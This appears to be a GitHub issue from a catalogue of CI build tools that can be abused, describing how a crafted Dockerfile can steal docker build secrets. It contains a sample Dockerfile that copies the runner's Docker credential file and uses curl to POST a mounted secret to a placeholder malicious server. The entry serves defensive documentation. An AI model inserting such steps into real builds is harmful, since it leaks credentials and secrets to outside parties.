You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
docker is tool to build / inspect OCI images and run containers. The build stage can be configured with Dockerfile
Configuration files
Dockerfile
Exfiltration scenario
In the case where build-time secrets are exposed to docker build, a maliciously crafted Dockerfile could allow exfiltration of the secrets
FROM ubuntu:latest
ADD /home/runner/.docker/config.json config.json
RUN ...
RUN --mount=type=secret,id=mysecret \
sh -c 'curl -X POST -d "@/run/secrets/mysecret" http://malicious-server.example.com'
The text was updated successfully, but these errors were encountered:
Description of the LOTP tool
dockeris tool to build / inspect OCI images and run containers. The build stage can be configured withDockerfileConfiguration files
Exfiltration scenario
In the case where build-time secrets are exposed to
docker build, a maliciously craftedDockerfilecould allow exfiltration of the secretsThe text was updated successfully, but these errors were encountered: